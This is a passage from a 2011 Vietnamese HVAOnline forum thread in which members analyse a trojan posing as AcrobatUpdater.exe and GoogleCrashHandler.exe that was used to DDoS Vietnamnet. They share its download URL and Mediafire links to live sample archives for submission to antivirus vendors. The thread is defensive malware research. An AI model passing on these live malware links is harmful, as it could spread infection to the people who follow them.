Nó không mới đâu anh PXM. Vẫn là AcrobatUpdater.exe cũ, được down về từ http://penop.net/images01.gif. Code của con này vẫn vậy, chỉ khác các con AcrobatUpdater.exe cũ ở chổ fix một số bug, cải tiến một số hàm, còn lại cơ bản vẫn không đổi, không thêm thêm được 1 hàm nào cả. Em đã upload nó lên 1 loạt AVs rồi, chờ update thôi anh !

Vấn đề quan trọng bây giờ là tìm ra mẫu đang ddos Vietnamnet, tìm ra cái C&C webserver giấu mặt này của bọn stl.

Các bạn đừng sợ, ngại ngùng gì cả, các bạn chỉ tìm mẫu, up mẫu thì mắc mớ cái gì phải sợ, sợ stl, sợ pháp luật à ? Pháp luật nào cấm các bạn tham gia HVA forum, cấm tham gia thảo luận, RCE virus, cấm tìm và up mẫu virus ?????

Tôi nói vậy vì có nhiều bạn PM, mail cho tui để gởi mẫu, nhưng lại sợ tôi nói ra nick HVA, mail address của các bạn. Dĩ nhiên là tôi sẽ làm theo yêu cầu của các bạn. Nhưng tôi lại ngạc nhiên, sao lại phải sợ, tôi, anh PXMMRF, accourics.... và nhiều anh em HVA trong nước không sợ thì tại sao các bạn lại sợ ????????

2 .lht.: Trò mèo của stl chỉ ở mức user mode, code = C/C++ & VB, hoạt động bình thường ở mức user mode như các app bình thường khác. Coder của stl chưa dùng 1 kỹ thuật pure ASM tiên tiến nào mà giới virus writer thế giới đang dùng, và cũng chưa đụng tới kernel driver. Khi nào tụi nó đụng tới rootkit tui sẽ post phân tích. Đang luyện lại SoftIce và WinDbg để chuẩn bị debug rootkit của mấy anh stl, bỏ lâu lụt nghề rồi. 


Anh TQN có up lên cho Microsoft không ? KIS em mua bị đứng hoài nên trở lại dùng MSE rồi. AV nào trả lời, chưa trả lời anh cho mọi người biết luôn để yên tâm.

[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 21/08/2011 12:00:06 (+0700) | #532 | 245468
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Anh chỉ up lên KIS, Avira, MS. Avira update và trả lời, phản hồi nhanh nhất.
Bà con phụ một tay, vào thư mục sau: http://www.mediafire.com/?tz745o0f678w8, xếp theo ngày, down về và up lên các AVs khác giùm.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 21/08/2011 12:29:36 (+0700) | #533 | 245470
vndncn
Member

[Minus]    0    [Plus]
Joined: 21/08/2006 10:38:00
Messages: 77
Offline
[Profile] [PM]
This post is set hidden by a moderator because it may be violating forum's guideline or it needs modification before setting visible to members.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 21/08/2011 13:54:42 (+0700) | #534 | 245472
weasel1026789
Member

[Minus]    0    [Plus]
Joined: 25/06/2011 23:51:19
Messages: 10
Offline
[Profile] [PM]
Mình dùng thằng NIS2011 scan cái AdobatUpdater mới nhất mà nó không phát hiện được là virus, mình submit lên web của nó rồi, hi vọng nó trả lời sớm.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 21/08/2011 14:01:42 (+0700) | #535 | 245475
vndncn
Member

[Minus]    0    [Plus]
Joined: 21/08/2006 10:38:00
Messages: 77
Offline
[Profile] [PM]
This post is set hidden by a moderator because it may be violating forum's guideline or it needs modification before setting visible to members.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 21/08/2011 14:43:33 (+0700) | #536 | 245476
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
2 vndncn: Google: submit malware sample

Trước mắt, các bạn chịu khó search trên máy các bạn, nếu có tìm thấy file: GoogleCrashHandler.exe, vui lòng upload lên đâu đó giùm anh em kỹ thuật của HVA. Cảm ơn nhiều !
Vì GoogleCrashHandler.exe, GoogleUpdater.exe nguyên bản là file của Google, stl coder build ra file khác nhưng vẫn giả danh (dùng cùng tên) với file của Google, nên tui mạn phép hướng dẫn các bạn kiểm tra file sạch của Google bằng hình sau:



File nào cũng vậy, nếu right click, property ra hình trên thì là file sạch, có Digital Signatures, còn không có thì là file virus.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 21/08/2011 16:29:25 (+0700) | #537 | 245482
[Avatar]
sacroyant
Member

[Minus]    0    [Plus]
Joined: 05/11/2007 21:54:12
Messages: 12
Offline
[Profile] [PM] [WWW]

TQN wrote:
2 vndncn: Google: submit malware sample

Trước mắt, các bạn chịu khó search trên máy các bạn, nếu có tìm thấy file: GoogleCrashHandler.exe, vui lòng upload lên đâu đó giùm anh em kỹ thuật của HVA. Cảm ơn nhiều ! 


http://www.mediafire.com/?bdl5qgxbrd9aet3
Bác kiểm tra giùm!
Thanks!
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 21/08/2011 16:33:06 (+0700) | #538 | 245483
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Cảm ơn sacroyant: file cậu úp là file GoogleCrashHandler.pf, tức file prefetch cache của GoogleCrashHandler.exe. Phải là đuôi .exe nhé !
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 21/08/2011 16:58:21 (+0700) | #539 | 245484
[Avatar]
sacroyant
Member

[Minus]    0    [Plus]
Joined: 05/11/2007 21:54:12
Messages: 12
Offline
[Profile] [PM] [WWW]

TQN wrote:
Cảm ơn sacroyant: file cậu úp là file GoogleCrashHandler.pf, tức file prefetch cache của GoogleCrashHandler.exe. Phải là đuôi .exe nhé ! 


Sorry bác, tôi không nhìn kỹ chỗ bác bôi đỏ. Máy của tôi có cài chrome nhưng không tìm thấy file GoogleCrashHandler.exe.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 21/08/2011 17:03:38 (+0700) | #540 | 245486
lequi
Member

[Minus]    0    [Plus]
Joined: 29/04/2007 18:13:32
Messages: 77
Offline
[Profile] [PM]
Theo ý kiến của em, nếu được ai đó nên viết 1 tool remove cái đống "meo què" này, sau đó anh conmale viết 1 bài (kiểu bài báo) để mọi người đem phổ biến ở các website, forum.
Nếu may mắn hơn 1 trang báo nào đó (vnexpress, vietnamnet, ...) đăng tin thì càng tốt nữa.
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|